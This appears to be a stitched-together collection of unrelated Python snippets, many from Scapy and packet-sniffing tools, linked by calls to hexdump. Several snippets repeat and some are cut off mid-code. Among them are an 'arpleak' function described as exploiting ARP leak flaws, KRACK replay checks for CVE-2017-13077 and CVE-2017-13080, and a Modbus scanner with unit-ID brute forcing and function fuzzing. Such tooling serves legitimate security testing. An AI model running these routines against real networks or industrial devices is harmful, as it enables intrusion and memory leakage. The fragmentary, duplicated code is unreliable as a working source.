def Request(self, functionId, data=''): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(self.timeout) sock.connect((self.ip,self.port)) sock.send(ModbusPacket(0, self.uid, functionId, data).pack()) if debug_mode: print "\n------------------send package:" print hexdump(ModbusPacket(0, self.uid, functionId, data).pack()) reply = sock.recv(1024) if debug_mode: print "\n------------------recv package:" print hexdump(reply) if not reply: raise ModbusError(0) response = ModbusPacket().unpack(reply) if response.unitId != self.uid: raise ModbusProtocolError('Unexpected unit ID or incorrect packet', reply) if response.functionId != functionId: raise ModbusError(ord(response.data[0])) return response.data
def Request(self, functionId, data=''): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(self.timeout) sock.connect((self.ip, self.port)) sock.send(ModbusPacket(0, self.uid, functionId, data).pack()) if debug_mode: print "\n------------------send package:" print hexdump(ModbusPacket(0, self.uid, functionId, data).pack()) reply = sock.recv(1024) if debug_mode: print "\n------------------recv package:" print hexdump(reply) if not reply: raise ModbusError(0) response = ModbusPacket().unpack(reply) if response.unitId != self.uid: raise ModbusProtocolError('Unexpected unit ID or incorrect packet', reply) if response.functionId != functionId: raise ModbusError(ord(response.data[0])) return response.data
def connect(self, hwaddr): p = ( bluetooth.HCI_Hdr() / bluetooth.HCI_Command_Hdr(opcode=0x200d) / bluetooth.HCI_Cmd_LE_Create_Connection( interval=96, window=48, filter=0, patype=1, paddr=hwaddr, atype=1, min_interval=24, max_interval=40, latency=0, timeout=500, min_ce=0, max_ce=0, ) ) self._send(p) while True: p = self.socket.recv() if self.debug: hexdump(p) if p.type == 4: if p.code == 0x3e and p.event == 1 and p.status == 0: if self.debug: print(f"Connected with handle {p.handle}") self.connection_handle = p.handle return
def show_pkt(pkt): from scapy.layers import inet, l2 from scapy.utils import hexdump payload = pkt.get_payload() ip = inet.IP(payload) print '%s to %s' %(ip.src, ip.dst) hexdump(ip) #pkt.drop() pkt.accept()
def hexdump(self, lfilter=None): """Same as nsummary(), except that packets are also hexdumped lfilter: a truth function that decides whether a packet must be displayed""" for i, res in enumerate(self.res): p = self._elt2pkt(res) if lfilter is not None and not lfilter(p): continue print "%s %s %s" % (conf.color_theme.id( i, fmt="%04i"), p.sprintf("%.time%"), self._elt2sum(res)) hexdump(p)
def padding(self, lfilter=None): """Same as hexraw(), for Padding layer""" for i, res in enumerate(self.res): p = self._elt2pkt(res) if p.haslayer(conf.padding_layer): if lfilter is None or lfilter(p): print "%s %s %s" % (conf.color_theme.id( i, fmt="%04i"), p.sprintf("%.time%"), self._elt2sum(res)) hexdump(p.getlayer(conf.padding_layer).load)
def padding(self, lfilter=None): """Same as hexraw(), for Padding layer""" for i, res in enumerate(self.res): p = self._elt2pkt(res) if p.haslayer(conf.padding_layer): if lfilter is None or lfilter(p): print "%s %s %s" % (conf.color_theme.id(i,fmt="%04i"), p.sprintf("%.time%"), self._elt2sum(res)) hexdump(p.getlayer(conf.padding_layer).load)
def hexdump(self, lfilter=None): """Same as nsummary(), except that packets are also hexdumped lfilter: a truth function that decides whether a packet must be displayed""" for i, res in enumerate(self.res): p = self._elt2pkt(res) if lfilter is not None and not lfilter(p): continue print "%s %s %s" % (conf.color_theme.id(i,fmt="%04i"), p.sprintf("%.time%"), self._elt2sum(res)) hexdump(p)
def ppp(headline, packet): """ Return string containing the output of scapy packet.show() call. """ o = StringIO() old_stdout = sys.stdout sys.stdout = o print(headline) hexdump(packet) print("") packet.show() sys.stdout = old_stdout return o.getvalue()
def hexraw(self, lfilter=None): """Same as nsummary(), except that if a packet has a Raw layer, it will be hexdumped lfilter: a truth function that decides whether a packet must be displayed""" for i, res in enumerate(self.res): p = self._elt2pkt(res) if lfilter is not None and not lfilter(p): continue print "%s %s %s" % (conf.color_theme.id( i, fmt="%04i"), p.sprintf("%.time%"), self._elt2sum(res)) if p.haslayer(conf.raw_layer): hexdump(p.getlayer(conf.raw_layer).load)
def hexraw(self, lfilter=None): """Same as nsummary(), except that if a packet has a Raw layer, it will be hexdumped lfilter: a truth function that decides whether a packet must be displayed""" for i, res in enumerate(self.res): p = self._elt2pkt(res) if lfilter is not None and not lfilter(p): continue print "%s %s %s" % (conf.color_theme.id(i,fmt="%04i"), p.sprintf("%.time%"), self._elt2sum(res)) if p.haslayer(conf.raw_layer): hexdump(p.getlayer(conf.raw_layer).load)
def return_info(self): """Returns an information request response""" self.logger.debug("Returning information request") info_clients = [] for client in list(self.server.clients.values()): info_client = SAPRouterInfoClient(id=client.id) info_client.address = client.address if client.routed: info_client.partner = client.partner info_client.service = client.service info_client.connected_on = unix_time(client.connected_on) info_client.flag_traced = client.traced info_client.flag_routed = client.routed info_client.flag_connected = client.connected info_clients.append(info_client) info_clients = "".join([str(client) for client in info_clients]) info_pkt = Raw(info_clients) self.request.send(info_pkt) self.session.add_event("Returned information request", response=str(info_pkt)) __, server_port = self.server.server_address info_pkt = SAPRouterInfoServer(pid=self.pid, ppid=self.parent_pid, started_on=unix_time(self.time_started), port=server_port, pport=self.parent_port) hexdump(info_pkt) self.request.send(info_pkt) self.session.add_event("Returned information request", data={"packet": "info_packet"}, response=str(info_pkt)) info_pkt = Raw("Total no. of clients: %d\x00" % len(self.server.clients)) self.request.send(info_pkt) self.session.add_event("Returned information request", data={"packet": "total_no_clients"}, response=str(info_pkt)) info_pkt = Raw("Working directory : %s\x00" % self.route_table_working_directory) self.request.send(info_pkt) self.session.add_event("Returned information request", data={"packet": "working_directory"}, response=str(info_pkt)) info_pkt = Raw("Routtab : %s\x00" % self.route_table_filename) self.request.send(info_pkt) self.session.add_event("Returned information request", data={"packet": "routtab"}, response=str(info_pkt)) self.request.close()
def nzpadding(self, lfilter=None): """Same as padding() but only non null padding""" for i, res in enumerate(self.res): p = self._elt2pkt(res) if p.haslayer(conf.padding_layer): pad = p.getlayer(conf.padding_layer).load if pad == pad[0]*len(pad): continue if lfilter is None or lfilter(p): print "%s %s %s" % (conf.color_theme.id(i,fmt="%04i"), p.sprintf("%.time%"), self._elt2sum(res)) hexdump(p.getlayer(conf.padding_layer).load)
def padding(self, lfilter=None): # type: (Optional[Callable[..., bool]]) -> None """Same as hexraw(), for Padding layer""" for i, res in enumerate(self.res): p = self._elt2pkt(res) if p.haslayer(conf.padding_layer): if lfilter is None or lfilter(p): print("%s %s %s" % (conf.color_theme.id(i, fmt="%04i"), p.sprintf("%.time%"), self._elt2sum(res))) hexdump( p.getlayer(conf.padding_layer).load # type: ignore )
def nzpadding(self, lfilter=None): """Same as padding() but only non null padding""" for i, res in enumerate(self.res): p = self._elt2pkt(res) if p.haslayer(conf.padding_layer): pad = p.getlayer(conf.padding_layer).load if pad == pad[0] * len(pad): continue if lfilter is None or lfilter(p): print "%s %s %s" % (conf.color_theme.id( i, fmt="%04i"), p.sprintf("%.time%"), self._elt2sum(res)) hexdump(p.getlayer(conf.padding_layer).load)
def __str__(self): assert (self.valid) old_stdout = sys.stdout sys.stdout = buffer = StringIO() hexdump(self.exp_pkt) print('mask =', end=' ') for i in range(0, len(self.mask), 16): if i > 0: print('%04x ' % i, end=' ') print(' '.join('%02x' % (x) for x in self.mask[i:i + 8]), end=' ') print('', end=' ') print(' '.join('%02x' % (x) for x in self.mask[i + 8:i + 16])) sys.stdout = old_stdout return buffer.getvalue()
def arpleak(target, plen=255, hwlen=255, **kargs): # type: (str, int, int, **Any) -> Tuple[SndRcvList, PacketList] """Exploit ARP leak flaws, like NetBSD-SA2017-002. https://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2017-002.txt.asc """ # We want explicit packets pkts_iface = {} # type: Dict[str, List[Ether]] for pkt in ARP(pdst=target): # We have to do some of Scapy's work since we mess with # important values iface = conf.route.route(pkt.pdst)[0] psrc = get_if_addr(iface) hwsrc = get_if_hwaddr(iface) pkt.plen = plen pkt.hwlen = hwlen if plen == 4: pkt.psrc = psrc else: pkt.psrc = inet_aton(psrc)[:plen] pkt.pdst = inet_aton(pkt.pdst)[:plen] if hwlen == 6: pkt.hwsrc = hwsrc else: pkt.hwsrc = mac2str(hwsrc)[:hwlen] pkts_iface.setdefault(iface, []).append( Ether(src=hwsrc, dst=ETHER_BROADCAST) / pkt ) ans, unans = SndRcvList(), PacketList(name="Unanswered") for iface, pkts in viewitems(pkts_iface): ans_new, unans_new = srp(pkts, iface=iface, filter="arp", **kargs) ans += ans_new unans += unans_new ans.listname = "Results" unans.listname = "Unanswered" for _, rcv in ans: if ARP not in rcv: continue rcv = rcv[ARP] psrc = rcv.get_field('psrc').i2m(rcv, rcv.psrc) if plen > 4 and len(psrc) > 4: print("psrc") hexdump(psrc[4:]) print() hwsrc = rcv.get_field('hwsrc').i2m(rcv, rcv.hwsrc) if hwlen > 6 and len(hwsrc) > 6: print("hwsrc") hexdump(hwsrc[6:]) print() return ans, unans
def ModScan(ip, port, options): global debug_mode global func_fuzzing global di_scan debug_mode = False func_fuzzing = False di_scan = False res = False if options.debug: debug_mode = True if options.func_fuzzing: func_fuzzing = True if options.device_info_scan: di_scan = True try: data = options.modbus_data.decode( "string-escape") if options.modbus_data else '' if options.brute_uid: uids = [0, 255] + range(1, 255) elif options.modbus_uid: uids = [int(uid.strip()) for uid in options.modbus_uid.split(',')] elif options.func_fuzzing: uids = [0] else: uids = [0, 255] for uid in uids: unitInfo = ScanUnit(ip, port, uid, options.modbus_timeout, options.modbus_function, data) if unitInfo: if not res: print "%s:%d Modbus/TCP" % (ip, port) res = True print "Unit ID:%d" % uid for line in unitInfo: print " %s" % line return res except ModbusProtocolError as e: print "%s:%d Modbus protocol error: %s (packet: %s)" % ( ip, port, e.message, e.packet.encode('hex')) if debug_mode: print hexdump(e.packet) return res except socket.error as e: print "%s:%d %s" % (ip, port, e) return res
def arpleak(target, plen=255, hwlen=255, **kargs): """Exploit ARP leak flaws, like NetBSD-SA2017-002. https://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2017-002.txt.asc """ # We want explicit packets pkts_iface = {} for pkt in ARP(pdst=target): # We have to do some of Scapy's work since we mess with # important values iface = conf.route.route(pkt.pdst)[0] psrc = get_if_addr(iface) hwsrc = get_if_hwaddr(iface) pkt.plen = plen pkt.hwlen = hwlen if plen == 4: pkt.psrc = psrc else: pkt.psrc = inet_aton(psrc)[:plen] pkt.pdst = inet_aton(pkt.pdst)[:plen] if hwlen == 6: pkt.hwsrc = hwsrc else: pkt.hwsrc = mac2str(hwsrc)[:hwlen] pkts_iface.setdefault(iface, []).append( Ether(src=hwsrc, dst=ETHER_BROADCAST) / pkt ) ans, unans = SndRcvList(), PacketList(name="Unanswered") for iface, pkts in viewitems(pkts_iface): ans_new, unans_new = srp(pkts, iface=iface, filter="arp", **kargs) ans += ans_new unans += unans_new ans.listname = "Results" unans.listname = "Unanswered" for _, rcv in ans: if ARP not in rcv: continue rcv = rcv[ARP] psrc = rcv.get_field('psrc').i2m(rcv, rcv.psrc) if plen > 4 and len(psrc) > 4: print("psrc") hexdump(psrc[4:]) print() hwsrc = rcv.get_field('hwsrc').i2m(rcv, rcv.hwsrc) if hwlen > 6 and len(hwsrc) > 6: print("hwsrc") hexdump(hwsrc[6:]) print() return ans, unans
def __str__(self): assert self.valid old_stdout = sys.stdout sys.stdout = buffer = StringIO() hexdump(self.exp_pkt) print("mask =", end=" ") for i in range(0, len(self.mask), 16): if i > 0: print("%04x " % i, end=" ") print(" ".join("%02x" % (x) for x in self.mask[i : i + 8]), end=" ") print("", end=" ") print(" ".join("%02x" % (x) for x in self.mask[i + 8 : i + 16])) sys.stdout = old_stdout return buffer.getvalue()
def ModScan(ip, port, options): global debug_mode global func_fuzzing global di_scan debug_mode = False func_fuzzing = False di_scan = False res = False if options.debug: debug_mode = True if options.func_fuzzing: func_fuzzing = True if options.device_info_scan: di_scan = True try: data = options.modbus_data.decode("string-escape") if options.modbus_data else '' if options.brute_uid: uids = [0,255] + range(1,255) elif options.modbus_uid: uids = [int(uid.strip()) for uid in options.modbus_uid.split(',')] elif options.func_fuzzing: uids = [0] else: uids = [0,255] for uid in uids: unitInfo = ScanUnit(ip, port, uid, options.modbus_timeout, options.modbus_function, data) if unitInfo: if not res: print "%s:%d Modbus/TCP" % (ip, port) res = True print "Unit ID:%d" % uid for line in unitInfo: print " %s" % line return res except ModbusProtocolError as e: print "%s:%d Modbus protocol error: %s (packet: %s)" % (ip, port, e.message, e.packet.encode('hex')) if debug_mode: print hexdump(e.packet) return res except socket.error as e: print "%s:%d %s" % (ip, port, e) return res
def extract_iv(self, pkt): # Get IV TSC, _, _ = parse_TKIP_hdr(pkt) iv = TSC[0] | (TSC[1] << 8) | (TSC[2] << 16) | (TSC[3] << 24) | \ (TSC[4] << 32) | (TSC[5] << 40) log_runtime.info("Got a packet with IV: %s", hex(iv)) if self.last_iv is None: self.last_iv = iv else: if iv <= self.last_iv: log_runtime.warning("IV re-use!! Client seems to be " "vulnerable to handshake 3/4 replay " "(CVE-2017-13077)" ) data_clear = None # Normal decoding data = parse_data_pkt(pkt, self.tk) try: data_clear = check_MIC_ICV(data, self.mic_sta_to_ap, pkt.addr2, pkt.addr3) except (ICVError, MICError): pass # Decoding with a 0's TK if data_clear is None: data = parse_data_pkt(pkt, "\x00" * len(self.tk)) try: mic_key = "\x00" * len(self.mic_sta_to_ap) data_clear = check_MIC_ICV(data, mic_key, pkt.addr2, pkt.addr3) log_runtime.warning("Client has installed an all zero " "encryption key (TK)!!") except (ICVError, MICError): pass if data_clear is None: log_runtime.warning("Unable to decode the packet, something went " "wrong") log_runtime.debug(hexdump(pkt, dump=True)) self.deal_common_pkt(pkt) return log_runtime.debug(hexdump(data_clear, dump=True)) pkt = LLC(data_clear) log_runtime.debug(repr(pkt)) self.deal_common_pkt(pkt)
def load_pkts(self, pkts): self.view.clear_info() for p in pkts: self.view.add_pkt( dict(pkt_summary=p.summary(), pkt_hex=hexdump(p, dump=True), pkt_detail=p.show(dump=True)))
def check_arp_reply(self, pkt): data = parse_data_pkt(pkt, self.tk) try: data_clear = check_MIC_ICV(data, self.mic_sta_to_ap, pkt.addr2, pkt.addr3) except (ICVError, MICError): return decoded_pkt = LLC(data_clear) log_runtime.debug(hexdump(decoded_pkt, dump=True)) log_runtime.debug(repr(decoded_pkt)) self.deal_common_pkt(decoded_pkt) if ARP not in decoded_pkt: return # ARP.op 2: is-at if decoded_pkt[ARP].op == 2 and \ decoded_pkt[ARP].psrc == self.arp_target_ip and \ decoded_pkt[ARP].pdst == self.arp_source_ip: # Got the expected ARP if self.krack_state & 4 == 0: # First time, normal behavior log_runtime.info("Got ARP reply, this is normal") self.krack_state |= 4 log_runtime.info("Trying to trigger CVE-2017-13080") raise self.RENEW_GTK() else: # Second time, the packet has been accepted twice! log_runtime.warning("Broadcast packet accepted twice!! " "(CVE-2017-13080)")
def ppp(headline, packet): """Return string containing headline and output of scapy packet.show()""" return "%s\n%s\n\n%s\n" % ( headline, hexdump(packet, dump=True), packet.show(dump=True), )
def generate_someip_based_tcp(self, s_ip, d_ip, s_port, d_port, seq=2496318543, ack=594476641, flags="PA", matrix=None): vlan = Dot1Q(vlan=4) ip = IP(src=s_ip, dst=d_ip) tcp = TCP(flags=flags, sport=s_port, dport=d_port, seq=seq, ack=ack) if flags == "PA": # PSH+ACK if matrix is None: matrix = {} srv_id = matrix.get("srv_id", 0xffff) method_id = matrix.get("method_id", 65535) session_id = matrix.get("session_id", 1) msg_type = matrix.get("msg_type", SOMEIP.TYPE_NOTIFICATION) req_data = matrix.get("req_data", []) someip = SOMEIP(srv_id=srv_id, sub_id=0x0, method_id=method_id, event_id=0, client_id=method_id, session_id=session_id, msg_type=msg_type) packet = b''.join([bytes().fromhex(i) for i in req_data]) target = ip / tcp / someip / packet elif flags == "A": # ACK target = ip / tcp else: target = ip / tcp payload_length = len(target) hex_target = hexdump(target, True) results = hex_target.split("\n") finalResult = [] for item in results: finalResult.append(item.split(" ")[1]) x = " ".join(finalResult) x_list = x.split(" ") return payload_length, x_list
def escape_packets(self): # Messy... self.escaped_packets = list() bad_packet_indices_indices = list() for idx, packet in enumerate(self.packets): print( f"\n= UNESCAPE PACKET {idx} ====================================" ) hexdump(packet) unescaped_packet = bytearray() escaped = False drop_packet = False for byte_idx, byte in enumerate(packet[:-1]): if escaped: if byte == 0x5E: byte = 0x7E elif byte == 0x5D: byte = 0x7D elif 0x40 > byte >= 0x20: byte = byte - 0x20 else: print( f"[ERROR] Incorrect byte escape value ({hex(byte)}) on byte {hex(byte_idx)} in packet {idx}... dropping packet" ) # bad_packet_indices_indices.append(idx) drop_packet = True break escaped = False unescaped_packet.append(byte) elif byte == 0x7D: escaped = True else: unescaped_packet.append(byte) if drop_packet: continue if escaped: print(f"[WARN] ends with 0x7D") unescaped_packet.extend(packet[-1:]) calculated_crc = FCS16.calculate(unescaped_packet[1:-3]).hex() extracted_crc = unescaped_packet[-3:-1].hex() if calculated_crc != extracted_crc: print(f"[WARN] - CRC mismatch!") print(f" CALCULATED FCS: {calculated_crc}") print(f" EXTRACTED FCS: {extracted_crc}") self.escaped_packets.append(unescaped_packet) for idx in bad_packet_indices_indices: del self.packet_start_indices[idx]
def pkt_handler(self, pkt): self.content = pkt.show(dump=True) self.summary = pkt.summary() self.find_src(self.content) self.find_dest(self.content) self.find_size(self.content) self.find_proto(self.content) self.hexinfo = utils.hexdump(pkt, dump=True)
def handle_probe_response(self, pkt): """Process 802.11 Probe Response Frame for WPS IE.""" try: mgt = self.rtDecoder.get_protocol(dot11.Dot11ManagementFrame) probe = self.rtDecoder.get_protocol(dot11.Dot11ManagementProbeResponse) bssid = get_addr_from_list(mgt.get_bssid()) essid = probe.get_ssid() # If null byte in the SSID IE, its cloacked. if essid is None or essid.find("\x00") != -1: essid = "<No ssid>" if bssid in self.aps: return rt = self.rtDecoder.get_protocol(dot11.RadioTap) freq = rt.get_channel()[0] channel = frequencies_dict[freq] vendor = get_vendor(bssid) vendorIEs = probe.get_vendor_specific() wps = self.wps_parser.has_wps(vendorIEs) # print 'checking wps info' if self.wps_parser.has_wps(vendorIEs): hexdump(vendorIEs) wpsInfo = self.wps_parser.parse_wps(vendorIEs) if wpsInfo: self.wps_aps[bssid] = wpsInfo print("[%s] - [%s]\t%s'\nWPS Information" % (bssid, essid, vendor)) for key, value in wpsInfo.items(): print("[WPSINFO] * %s: %s" % (key, repr(value))) self.wps_parser.parse_probe_response(pkt) enc = self.get_security(pkt) self.aps[bssid] = (channel, essid, enc, wps) self.logger.info( '[+] AP discovered! ProbeResponse channel: %s ESSID: %s Encryption: %s WPS: %s Vendor: %s' % (channel, _green(essid), _colorize_security(enc), _colorize_wps(wps), _green(get_vendor(bssid)))) except Exception: print('Error while parsing probe responsse') print(str(sys.exc_info())) return
def packet_info(self): self.curr_idx = len(p_list) for i in range(self.prev_idx, self.curr_idx): self.emit( 'packet_info', dict(pkt_summary=p_list[i].summary(), pkt_detail=p_list[i].show(dump=True), pkt_hex=hexdump(p_list[i], dump=True))) self.prev_idx = self.curr_idx
def pkt_handler(pkt): content = pkt.show(dump=True) summary = pkt.summary() hex = utils.hexdump(pkt, dump=True) print(content) print(summary) find_src(summary) find_dest(summary) print(hex)
def print_data(self, data): print("Source MAC: " + data["source_mac"]) print("Destination MAC: " + data["destination_mac"]) print("Source IP: " + data["source_ip"]) print("Destination IP: " + data["destination_ip"]) print("SPORT: " + str(data["sport"])) print("DPORT: " + str(data["dport"])) print("PACKET DATA\n\n") print(hexdump(data["load"])) print("*" * 100)
def save_data(self, data): load_data = str(hexdump(data["load"], dump=True)) save_data = "\nSource MAC: " + str( data["source_mac"]) + "\nDestination MAC: " + str( data["destination_mac"]) + "\nSource IP: " + str( data["source_ip"]) + "\nDestination IP: " + str( data["destination_ip"]) + "\nSPORT: " + str( data["sport"]) + "\nDPORT: " + str( data["dport"] ) + "\nPACKET DATA\n\n" + load_data + "\n\n" + str( "*" * 100) self.file.write(save_data)
def moreinfo(self): self.S3.config(state=NORMAL) hi = self.variable.get().split(":") pos = int(hi[1]) if pos > 25: print("Out of bounds") self.S3.config(state=DISABLED) else: neu = int(pos - 1) print(hexdump(a[neu])) print(data) self.S3.config(state=DISABLED)
def handle_pkt(pkt): # print "got the probe" # pkt.show() str = hexdump(pkt, dump=True) print str str_list = str.split('\n') hex_str = "" for str in str_list: p1 = str.find(' ') p2 = str.find(' ', p1 + 2) hex_str += str[p1 + 2:p2] extract_metadata(hex_str) sys.stdout.flush()
def cdp_monitor_callback(pkt): print("Ejecutando método cdp_monitor_callback") #print(pkt.summary()) #802.3 00:da:55:77:5b:22 > 01:00:0c:cc:cc:cc / LLC / SNAP / CDPv2_HDR #print(pkt[LLC].summary()) #LLC / SNAP / CDPv2_HDR #pkt[LLC].show() #Show all packet in columns #print(pkt[SNAP].summary()) #SNAP / CDPv2_HDR #print(pkt[CDPv2_HDR].summary()) #CDPv2_HDR pkt[CDPv2_HDR].fields["msg"] #pkt[Raw].fields hexdump(pkt) #Show information in Hexadecimal #hexdump(raw) #Show information in Hexadecimal #e = pkt[Raw].fields print("Deciphering...") time.sleep(2) #pkt.command() #pkt.show(dump = True) #string = pkt.show(dump = True) #print(string) #pkt.display() #miDevice = open("miDevice.txt", "w") #miDevice.write(string) #miDevice.close() hostname = pkt["CDPMsgDeviceID"].val.decode('utf-8') ip = pkt["CDPAddrRecordIPv4"].addr interface = pkt["CDPMsgPortID"].iface.decode('utf-8') conjunto = "Hostname: "+ hostname + " IP: " + ip + " PortID: " + interface print(conjunto) miDevice = open("miDevice.txt", "w") miDevice.write(conjunto) miDevice.close() time.sleep(50)
def render(self, context): res = [] packet_count = 0 for p in context['packets']: layers = p.layers() subcontext = {'p': p.summary, 'num': packet_count} if TCP in layers: subcontext['border'] = 'border-success' elif UDP in layers: subcontext['border'] = 'border-primary' else: subcontext['border'] = 'border-danger' if IP in layers: subcontext['ip_version'] = p['IP'].version subcontext['ip_len'] = p['IP'].len subcontext['ip_id'] = p['IP'].id subcontext['ip_flags'] = p['IP'].flags subcontext['ip_ttl'] = p['IP'].ttl subcontext['ip_chksum'] = p['IP'].chksum if TCP in layers: subcontext['tcp_sport'] = p['TCP'].sport subcontext['tcp_dport'] = p['TCP'].dport subcontext['tcp_seq'] = p['TCP'].seq subcontext['tcp_ack'] = p['TCP'].ack subcontext['tcp_flags'] = p['TCP'].flags subcontext['tcp_chksum'] = p['TCP'].chksum if UDP in layers: subcontext['udp_sport'] = p['UDP'].sport subcontext['udp_dport'] = p['UDP'].dport subcontext['udp_len'] = p['UDP'].len subcontext['udp_chksum'] = p['UDP'].chksum if Raw in layers: subcontext['raw_load'] = hexdump(p['Raw'].load, dump=True) if Padding in layers: subcontext['padding'] = p['Padding'].load if Ether in layers: subcontext['ether_src'] = p['Ether'].src subcontext['ether_dst'] = p['Ether'].dst subcontext['ether_type'] = p['Ether'].type res.append(render_to_string('pcap_parsing/snippets/packet_snippet.html', subcontext)) packet_count += 1 # Debug. if settings.DEBUG: for l in layers: if l not in [UDP, TCP, Ether, Raw, IP, Padding]: print("{} Not currently supported. Please open an issue at " "https://github.com/TheToddLuci0/ISELab_Debugger/issues/new?assignees=TheToddLuci0&labels" "=Packet+Layer+Request%2C+enhancement&template=add-packet-layer.md&title=Add+Packet+Layer" "+LAYER_NAME".format(l)) return '\n'.join(res)
def privacy_monitoring_engine(dest_mac, src_mac, raw_data, src, target): pkt = Packet(raw_data) raw = pkt.lastlayer() Source_IP = src Destination_IP = target Source_MAC = src_mac Destination_MAC = dest_mac # Call the Shannon entropy Test here and pass the hexdump(raw) if (Privacy_Engine.entropy(str(hexdump(raw))) >= 3.5): lg.privacy_logger.info( str(datetime.datetime.now()) + ' Encrypted payload') lg.privacy_logger.info( str(datetime.datetime.now()) + ' Source IP: ' + str(Source_IP)) lg.privacy_logger.info( str(datetime.datetime.now()) + ' Destination IP: ' + str(Destination_IP)) lg.privacy_logger.info( str(datetime.datetime.now()) + ' Source MAC: ' + str(Source_MAC)) lg.privacy_logger.info( str(datetime.datetime.now()) + ' Destination MAC: ' + str(Destination_MAC)) else: lg.privacy_logger.info( str(datetime.datetime.now()) + ' Plain text found') lg.privacy_logger.info( str(datetime.datetime.now()) + ' Source IP: ' + str(Source_IP)) lg.privacy_logger.info( str(datetime.datetime.now()) + ' Destination IP: ' + str(Destination_IP)) lg.privacy_logger.info( str(datetime.datetime.now()) + ' Source MAC: ' + str(Source_MAC)) lg.privacy_logger.info( str(datetime.datetime.now()) + ' Destination MAC: ' + str(Destination_MAC)) Privacy_Engine.user_privacy_alerts(str(datetime.datetime.now()), str(Source_IP), str(Source_MAC))
def stop(self): logging.debug("tcpdump:stop()") self.device.get_tcpdump_file(self.file_path, self.out_filepath) obj = { 'plugin': 'tcpdump', 'file_path': self.out_filepath, 'summary': '', 'show': '', 'hexdump': '' } if os.path.isfile(self.out_filepath): packets = rdpcap(self.out_filepath) for packet in packets: obj['summary'] = packet.summary() obj['show'] = packet.show(dump=True) obj['hexdump'] = "\n" + hexdump(packet, dump=True) TCPDumpPlugin.parse(self.module, obj, '') else: print(f"{self.out_filepath} does not exist")
0xcb, 0x23, 0xeb, 0x9f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x55, 0x55, 0x55, 0x55, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x40, 0xf8, 0x00, 0x00, 0x00, 0x3c, 0x00, 0x00, 0x00, 0x04, 0x00, 0x10, 0x12, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00 ])) senddata5 = bytes(bytearray([ 0xe0, 0x7b, 0xca, 0x60, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x55, 0x55, 0x55, 0x55, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x40, 0xf8, 0x00, 0x00, 0x00, 0x3c, 0x00, 0x00, 0x00, 0x04, 0x00, 0x10, 0x12, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00 ])) data = senddata2 print "-------------send data:" print hexdump(data) sock.sendto(data, addr) recvdata, addr = sock.recvfrom(4096) print "-------------recv data:" print hexdump(recvdata)
def dump(self): """Prints the stream.""" hexdump(self.stream[self.offset:])
if __name__ == "__main__": print "test float encoding" from math import log max_expected_error = 1.0 / (2<<3) # four bit precision p = IGMPv3() for v in range(0, 31745): c = p.encode_float(v) d = p.decode_float(c) rel_err = float(v-d)/v if v!=0 else 0.0 assert rel_err <= max_expected_error print "construct membership query - general query" mq = IGMPv3(type=IGMP_TYPE_MEMBERSHIP_QUERY, max_resp_code=120) hexdump(str(mq)) print "construct membership query - group-specific query" mq = IGMPv3(type=IGMP_TYPE_MEMBERSHIP_QUERY, max_resp_code=120, gaddr="224.0.0.1") hexdump(str(mq)) print "construct membership query - group-and-source-specific query" mq = IGMPv3(type=IGMP_TYPE_MEMBERSHIP_QUERY, max_resp_code=120, gaddr="224.0.0.1") mq.srcs = ['1.2.3.4', '5.6.7.8'] hexdump(str(mq)) print "fixup" mq = IGMPv3(type=IGMP_TYPE_MEMBERSHIP_QUERY) mq.srcs = ['1.2.3.4', '5.6.7.8']
def parse_wps(self, IEs): "Returns dictionary with WPS Information." ret = {} # TODO: improve parsing try: for element in IEs: offset = 0 data = element[1] offset += 1 dataLength = len(data) # print('dataLength %s' % dataLength) while offset < dataLength: tagType = struct.unpack("!H", data[offset:offset + 2])[0] offset += 2 tagLen = struct.unpack("!H", data[offset:offset + 2])[0] offset += 2 tagData = data[offset:offset + tagLen] offset += tagLen # Get the Tag Type if self.WPS_DATA_ELEMENTS.has_key(tagType): tagType = self.WPS_DATA_ELEMENTS[tagType] else: tagType = None if tagType == "Wi-Fi Protected Setup State": if tagData == '\x01': tagData = "Not Configured" elif tagData == '\x02': tagData = "Configured" else: tagData = 'Reserved' if tagType == "UUID-E": aux = '' for c in tagData: aux += "%02X" % ord(c) tagData = aux if tagType == "Response Type": if tagData == '\x00': tagData = 'Enrollee, Info Only' elif tagData == '\x01': tagData = 'Enrollee, open 802.1X' elif tagData == '\x02': tagData = 'Registrar' elif tagData == '\x03': tagData = 'AP' else: tagData = '<unkwon>' if tagType == "Primary Device Type": category = struct.unpack("!H", tagData[0:2])[0] subCategory = struct.unpack("!H", tagData[6:8])[0] if category == 1: category = "Computer" if subCategory == 1: subCategory = "PC" elif subCategory == 2: subCategory = "Server" elif subCategory == 3: subCategory = "Media Center" else: subCategory = "<unkwon>" elif category == 2: category = "Input Device" subCategory = "<unkwon>" elif category == 3: category = "Printers, Scanners, Faxes and Copiers" if subCategory == 1: subCategory = "Printer" elif subCategory == 2: subCategory = "Scanner" else: subCategory = "<unkwon>" elif category == 4: category = "Camera" if subCategory == 1: subCategory = "Digital Still Camera" else: subCategory = "<unkwon>" elif category == 5: category = "Storage" if subCategory == 1: subCategory = "NAS" else: subCategory = "<unkwon>" elif category == 6: category = "Network Infrastructure" if subCategory == 1: subCategory = "AP" elif subCategory == 2: subCategory = "Router" elif subCategory == 3: subCategory = "Switch" else: subCategory = "<unkwon>" elif category == 7: category = "Display" if subCategory == 1: subCategory = "Television" elif subCategory == 2: subCategory = "Electronic Picture Frame" elif subCategory == 3: subCategory = "Projector" else: subCategory = "<unkwon>" elif category == 8: category = "Multimedia Devices" if subCategory == 1: subCategory = "DAR" elif subCategory == 